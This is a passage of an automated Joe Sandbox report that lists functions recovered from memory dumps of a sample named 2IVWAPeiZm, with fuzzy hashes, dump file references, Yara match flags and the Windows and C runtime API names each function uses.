                          • Opcode Fuzzy Hash: b78143fa32f064d218713fe95a5adf2227d442b671ea0c90b86e696d9d98e483
                          • Instruction Fuzzy Hash: 0D21C4306846844EF714AFA8D895BEE77BAEF87310F2D417CE416871E3D764CE428651
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                          • String ID:
                          • API String ID: 1909145217-0
                          • Opcode ID: 27add749fbee0590bf2bec2a260e94ba60e8cbf195f3a8d4dc1e4e486805c601
                          • Instruction ID: cce5117066acee2ef31f0e1d8cd73ba570337f7c51bf514ae70b224ee8edc38d
                          • Opcode Fuzzy Hash: 27add749fbee0590bf2bec2a260e94ba60e8cbf195f3a8d4dc1e4e486805c601
                          • Instruction Fuzzy Hash: 8321A1313866E281FB04AB25E948BDAA3B3B789BC0F44543DDD0E47359EB78CA42C304
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ObjectSelect$ColorCompatibleCreateDeleteTable
                          • String ID:
                          • API String ID: 3899591553-0
                          • Opcode ID: 3de61e68eef413ff6c6bd4ba23286e24295c83a60f82d45f4363372d56b9f668
                          • Instruction ID: 234ed4b2812096201180ee0efcdea53816d839668806f7b883d570619758a029
                          • Opcode Fuzzy Hash: 3de61e68eef413ff6c6bd4ba23286e24295c83a60f82d45f4363372d56b9f668
                          • Instruction Fuzzy Hash: 0C218E31240A91C9FB549F26E590B993376FB98FD8F10903ADE4A53718DF39C982C380
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$EnterLeave
                          • String ID:
                          • API String ID: 3168844106-0
                          • Opcode ID: 2a445fa39c5b0253e4bd2923b597622878c10cad0481ddc28a34dad83e9c0730
                          • Instruction ID: 0e6b81df3325846ce560153659404878c81fa24aeefad4a1cee930bbcab9f2d1
                          • Opcode Fuzzy Hash: 2a445fa39c5b0253e4bd2923b597622878c10cad0481ddc28a34dad83e9c0730
                          • Instruction Fuzzy Hash: C4110732660A9187EB90AB22F4947D97372F764751F845026DBCB43A60DF38E98AC700
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: 744e5961bd2884f54a06c4d55f49b2095068003750696114cf22942ce0b93080
                          • Instruction ID: 14b68f2f64b3e04795a1779e0658dc60538865794b29266087d3a762b838b353
                          • Opcode Fuzzy Hash: 744e5961bd2884f54a06c4d55f49b2095068003750696114cf22942ce0b93080
                          • Instruction Fuzzy Hash: 8201FE721D48C48DF2586754C591BD432F2FB10315F40827DF00AC69D2C779DD42C621
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: 3f8399101a99e04f111acb68838fd8e0fe981b5cff2cdfebbd5aafd65add2f64
                          • Instruction ID: 0b08e91d73e21c489f66813f113a3817570ede00f41acdbeb7cdbb5b9adf31da
                          • Opcode Fuzzy Hash: 3f8399101a99e04f111acb68838fd8e0fe981b5cff2cdfebbd5aafd65add2f64
                          • Instruction Fuzzy Hash: AF01D6341A05884EF708AB64C895BD833BAFF2B325F7D427CE006871E3D7798D428651
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                          • String ID:
                          • API String ID: 1445889803-0
                          • Opcode ID: 93f1a9ba9138021f6c49841d23b575579b0bcc3cc95a229cf794d83a4df072c6
                          • Instruction ID: 852921afdc1fa40df51cd22b0500a1ee37b43bc2cd1f97d20b2520618b15bbe2
                          • Opcode Fuzzy Hash: 93f1a9ba9138021f6c49841d23b575579b0bcc3cc95a229cf794d83a4df072c6
                          • Instruction Fuzzy Hash: 4401D631295AC582FB808F25F8447957373F759B90F446639EE5A477A4DB3CCE868300
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$Enter$DeleteGdiplusLeaveObjectShutdown
                          • String ID:
                          • API String ID: 1513102227-0
                          • Opcode ID: d0bf30436cb6d58d92d898ab182b5300c8b452775190517e675a416d92231e2b
                          • Instruction ID: 57cce3cbb79957f1df4e9ce384316e2983ed43be1ab8d2ab11d011b2e852e6a2
                          • Opcode Fuzzy Hash: d0bf30436cb6d58d92d898ab182b5300c8b452775190517e675a416d92231e2b
                          • Instruction Fuzzy Hash: 4611C931585A8785FB14AF28E890B943377F728B25F54823DC55E422B0DF39CA97C710
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: 8ad11543daa31dafea5a7ef4bb8147fe8d70931eb13c3c1b692cc721a04b9c45
                          • Instruction ID: 59acc741b239374f41bbac257c6b186cc62a1addbc5e7f6c7b0eeff3fb75abf3
                          • Opcode Fuzzy Hash: 8ad11543daa31dafea5a7ef4bb8147fe8d70931eb13c3c1b692cc721a04b9c45
                          • Instruction Fuzzy Hash: 2101A9716846E644FE095B24C8917EC22739B91B76F51772CD629073D1C778CE438720
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _errno_fltout2_invalid_parameter_noinfo
                          • String ID: -
                          • API String ID: 485257318-2547889144
                          • Opcode ID: 230054471ab9e94bf14a18ec9c1b65bcb69ff4194e86f8a2025a727ab66c8c29
                          • Instruction ID: 6d975a5da2501452d81ed0bf484249aaaecd0f2317462d8525fc659979cd0ee9
                          • Opcode Fuzzy Hash: 230054471ab9e94bf14a18ec9c1b65bcb69ff4194e86f8a2025a727ab66c8c29
                          • Instruction Fuzzy Hash: 8441D730258A884FF754EB28D481BAE73FAEF99354F2C053EA48AC3191DB21CD468753
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: EnumErrorEventEventsLastNetworkReset
                          • String ID:
                          • API String ID: 1050048411-3916222277
                          • Opcode ID: 7d9898d8a928488bb2d2e3ad9feb40c7b820fd09d0a22babb1b49dbd3cdc5722
                          • Instruction ID: d81159e8d142ec6f546478dc847c4dcc6171a1fd6fa201d21721a131658ca1dd
                          • Opcode Fuzzy Hash: 7d9898d8a928488bb2d2e3ad9feb40c7b820fd09d0a22babb1b49dbd3cdc5722
                          • Instruction Fuzzy Hash: 64518B761446C286F3708F2AD4C4B9977F3F785B88F150229DA8847689FB79CE468B00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _getptd
                          • String ID: csm
                          • API String ID: 3186804695-1018135373
                          • Opcode ID: 916a707afdb0f71ebe95bef2f33ca7e6fa47fc2edc3f926a604d61cd2de3a953
                          • Instruction ID: 27823d4b1363f1907507b80d5f15e0d1330c455112ef794140b19b80994e2faf
                          • Opcode Fuzzy Hash: 916a707afdb0f71ebe95bef2f33ca7e6fa47fc2edc3f926a604d61cd2de3a953
                          • Instruction Fuzzy Hash: CD3141701487448FEB68EF58C485BA9B3F6FF58311F68056DD48A87292DB31ED42CB82
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _errno_fltout2_invalid_parameter_noinfo
                          • String ID: -
                          • API String ID: 485257318-2547889144
                          • Opcode ID: bbdcb5bc06b9c46dfb1d423dceb7eebd86a9672f6a5897a7d82af974e746431d
                          • Instruction ID: 57246efe833cc0efb548625a94b90613c86f34033cb4489cb833ace9819bdc7e
                          • Opcode Fuzzy Hash: bbdcb5bc06b9c46dfb1d423dceb7eebd86a9672f6a5897a7d82af974e746431d
                          • Instruction Fuzzy Hash: FA21B831258E884BE754EB68D885BEB73EAFF94310F2C053EA45AC3191DF25CD468742
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno_fltout2_invalid_parameter_noinfo
                          • String ID: -
                          • API String ID: 485257318-2547889144
                          • Opcode ID: 35320a481620dab2e50c4e0e722baade6b2a87799585edebcd6d3ffa4115d845
                          • Instruction ID: df76d332873e9922737d48df5578d0a659888d0a779f3e5f326a7512a5983815
                          • Opcode Fuzzy Hash: 35320a481620dab2e50c4e0e722baade6b2a87799585edebcd6d3ffa4115d845
                          • Instruction Fuzzy Hash: FB312D327446C286FA10AF25E440BDDB773A7467D4F14423AEE8817BD5DB28CD46C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo
                          • String ID: 1
                          • API String ID: 2819658684-2212294583
                          • Opcode ID: c642461044470a636fc6584bdf35ba86ddc5126ec19c8575d3bd6bfd62c5adfc
                          • Instruction ID: 61600fee5e3dd8d4d1264fab7364ae2bbffb5948896447f79e807743b6c6f17b
                          • Opcode Fuzzy Hash: c642461044470a636fc6584bdf35ba86ddc5126ec19c8575d3bd6bfd62c5adfc
                          • Instruction Fuzzy Hash: 3B21F232A5A2D289FB16AF28C450BEC7AB79742780F99C039970106283D72DCF43CB11
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _callnewh_errno$AllocHeapmallocstd::exception::exception
                          • String ID: bad allocation
                          • API String ID: 2837191506-2104205924
                          • Opcode ID: f818d2775c6305b500d078a1a8a4caeafb0dc2e89b273f6cd29466fe778cb0c2
                          • Instruction ID: 7d45945c8d2f0b3a60395d5507fc41d2b15cb0ee758708613101aa11e7b17955
                          • Opcode Fuzzy Hash: f818d2775c6305b500d078a1a8a4caeafb0dc2e89b273f6cd29466fe778cb0c2
                          • Instruction Fuzzy Hash: 5C0117716947DB95FB14AB24E891FD423B3B754340F85603EA98A466A2EF3CCB46C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 1646373207-1276376045
                          • Opcode ID: 5736814c69beffde4e4d80d6363d91561644225385019cb1483e72a6c3f14607
                          • Instruction ID: cc8b348221a8df08854f6038582eaee80f553155ff2501c3aedf9320ef07c662
                          • Opcode Fuzzy Hash: 5736814c69beffde4e4d80d6363d91561644225385019cb1483e72a6c3f14607
                          • Instruction Fuzzy Hash: C4E012707917C241FE596B65E885BA823B35B68700F4C643F842E0A795DF68DF8BC300
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$Heap$FreeProcess
                          • String ID:
                          • API String ID: 3493288988-0
                          • Opcode ID: a9c4bccd5f9a346d1e3777055ef938d6c7925542efb5f64d06566f38dad4b808
                          • Instruction ID: 02fd873d4db9008b71757dd94e6faab37bb303bfa823f4d0ff5b690aa1cbb38d
                          • Opcode Fuzzy Hash: a9c4bccd5f9a346d1e3777055ef938d6c7925542efb5f64d06566f38dad4b808
                          • Instruction Fuzzy Hash: 4F317E36741AA193FB54DB66E140B9D6372FB89FC0F089129DF4A43B44CF34D9A28740
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfoiswctype
                          • String ID:
                          • API String ID: 248606491-0
                          • Opcode ID: 025969511743ca9b7b77820490b951f5d92e9bdbd70d4695079a5e4bd762ea18
                          • Instruction ID: a409104f7905c560a268e4eda0a993dda6a10481c5a2ef06805719fea66bb207
                          • Opcode Fuzzy Hash: 025969511743ca9b7b77820490b951f5d92e9bdbd70d4695079a5e4bd762ea18
                          • Instruction Fuzzy Hash: 8E61C732C8469949F7742619D846BF637EEEF52751F3C023DD99B861C2E760CE434285
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfoiswctype
                          • String ID:
                          • API String ID: 248606491-0
                          • Opcode ID: 51c6b283717e53557eb812972e9f858eb7df38c66164fb907231a6e952fa1e14
                          • Instruction ID: 4735c5bdb76219ed68de2f29735bc8d56dd2dba42c5814e6d7e2bb49f5c44a63
                          • Opcode Fuzzy Hash: 51c6b283717e53557eb812972e9f858eb7df38c66164fb907231a6e952fa1e14
                          • Instruction Fuzzy Hash: E751E6334CC69E47FB791519DA8ABFA31F6E751B60F20123DD892868D1EB74CE438182
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfoiswctype
                          • String ID:
                          • API String ID: 248606491-0
                          • Opcode ID: 6779dbc9006290503d7b8c82871114c35dbc3fce9c9751f5dd413b593bd34c68
                          • Instruction ID: d4f159cc8704b98c47e279f467eab7df214267434bb0f49aef2a50a5d3f37be0
                          • Opcode Fuzzy Hash: 6779dbc9006290503d7b8c82871114c35dbc3fce9c9751f5dd413b593bd34c68
                          • Instruction Fuzzy Hash: 7C51E532A845F346FBB45B2AD802FEA21F3AB40764F55653ADE53461C1F778CE879202
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodePointer_errno_invalid_parameter_noinfo_lock
                          • String ID:
                          • API String ID: 27599310-0
                          • Opcode ID: 8a5b73d5d9ca1ff1b538d391cd8af4bb4012ae1134a033dcb573f3cbad0ba9a6
                          • Instruction ID: 5a5cca8e32c16fe1e25a9dab215cef969610649eba1caea192d2224ed2ec24f4
                          • Opcode Fuzzy Hash: 8a5b73d5d9ca1ff1b538d391cd8af4bb4012ae1134a033dcb573f3cbad0ba9a6
                          • Instruction Fuzzy Hash: 9451F6316847E282FA69DB28E440FEA76B3F784744F64653DDA4A43694DB38DF43C200
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _getptd$BaseImage
                          • String ID:
                          • API String ID: 2482573191-0
                          • Opcode ID: 9c5b89509d60e0603f5a734c5cd4ba2a093cff095a5bf51701f84cb58c52bfef
                          • Instruction ID: 197594afeeda7828dbc0960f67c6e4609826bb358be0869b589a9b4486aece64
                          • Opcode Fuzzy Hash: 9c5b89509d60e0603f5a734c5cd4ba2a093cff095a5bf51701f84cb58c52bfef
                          • Instruction Fuzzy Hash: 15418E31598A458AF3146768C446BED72FAEF45324F3C86BEE456C31E3DB64DE438282
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_getbuf_invalid_parameter_noinfo_isatty
                          • String ID:
                          • API String ID: 3655708593-0
                          • Opcode ID: 87cd96422aea3bb6b0bce4e86e7506652a3eb2d6d527ccc641051d1cd25ab59a
                          • Instruction ID: d8f4f38671a4c0591dd0e1c1c35e3bf85c253b9bdf94d7b704b735f10896362c
                          • Opcode Fuzzy Hash: 87cd96422aea3bb6b0bce4e86e7506652a3eb2d6d527ccc641051d1cd25ab59a
                          • Instruction Fuzzy Hash: F851B132194A984FFB989F28C581FE936F2EB58320F14026DD855CB6D6D774DE82C780
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _errno$_getbuf_invalid_parameter_noinfo_isatty
                          • String ID:
                          • API String ID: 3655708593-0
                          • Opcode ID: b472cfe05d8d2ec8d2c21cd6346baf259e13895f094dcae3d3b00828071a2771
                          • Instruction ID: 76a027b6367f128b2f46bd50450372640a87b98aaa5307489fb3bcbfd263c106
                          • Opcode Fuzzy Hash: b472cfe05d8d2ec8d2c21cd6346baf259e13895f094dcae3d3b00828071a2771
                          • Instruction Fuzzy Hash: 7A516030154A884FFBA89F28C495BA977E6EF58310F2D07ADD857CB2D6D724CE428781
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno_invalid_parameter_noinfo$_getptd
                          • String ID:
                          • API String ID: 1297830140-0
                          • Opcode ID: 4b61b820ce18982db4ac574c72c3f4b0ba5c6ee02f44edb5eb580702fda48f22
                          • Instruction ID: 382cc4761e674a6889f983febabb1e119e7002ed9fbbe27a179118b6407aeb02
                          • Opcode Fuzzy Hash: 4b61b820ce18982db4ac574c72c3f4b0ba5c6ee02f44edb5eb580702fda48f22
                          • Instruction Fuzzy Hash: 8F41E0326447D586FB60AF65D588BE977B3E782BD0F05813ADB4943796CB28CA47C700
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$BaseImage_amsg_exit
                          • String ID:
                          • API String ID: 2306399499-0
                          • Opcode ID: 7508f3b3fd4028dca9c83341e5ac7cef807879085b4d62799d2ee17d16bee354
                          • Instruction ID: a46a31a3c97406802d780b6c1ab352eef81b8d6219b277a4461bbf7978abf761
                          • Opcode Fuzzy Hash: 7508f3b3fd4028dca9c83341e5ac7cef807879085b4d62799d2ee17d16bee354
                          • Instruction Fuzzy Hash: 5D419F3264068382FA28BB15D585FEDB6B7A784F9AF158539DE19437E2CB34CE478700
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Initialize_cinit
                          • String ID:
                          • API String ID: 3622512177-0
                          • Opcode ID: 999c38da4a7799e0715cc289d82767e970d3cc9920d0328cda324a3349d3ccc4
                          • Instruction ID: 35c973bcf40e1b5bc0798e8f8867006e821be344f8c032884e3525acf8bc2ff3
                          • Opcode Fuzzy Hash: 999c38da4a7799e0715cc289d82767e970d3cc9920d0328cda324a3349d3ccc4
                          • Instruction Fuzzy Hash: 8F3112306846814AFB50B778D962BE933BBAF41304F2D063DA547C62D3EF25CE428752
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno_getptd_invalid_parameter_noinfofree
                          • String ID:
                          • API String ID: 4053972703-0
                          • Opcode ID: 43f98ba4b15c26d521d80577bb0f8a8933ead76389b9e6d44e0add2e746f4bc6
                          • Instruction ID: d8bed324218c6db1c5078a01dc22eefd3476ab3aa7e2e11ba636c7d015b6ed27
                          • Opcode Fuzzy Hash: 43f98ba4b15c26d521d80577bb0f8a8933ead76389b9e6d44e0add2e746f4bc6
                          • Instruction Fuzzy Hash: 7F21B931688B494FF744BB69D846BA977F2EB98311F00463EE449C36A2DB60DD428782
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorEventLastSelect
                          • String ID:
                          • API String ID: 1135597009-0
                          • Opcode ID: 9729f9626bfa02fdb25227b366fcace41139834b60a4ecbd8e493ab59bbb4f50
                          • Instruction ID: 3c586218033fad26efa76cea1dedd17017c5a61168a63172f8a7656d78cb87be
                          • Opcode Fuzzy Hash: 9729f9626bfa02fdb25227b366fcace41139834b60a4ecbd8e493ab59bbb4f50
                          • Instruction Fuzzy Hash: DA21CFB260018187F750DF7AD488B9C37B3F754B98F540139CA18876D4EB7AC986CB10
                          APIs
                          Memory Dump Source
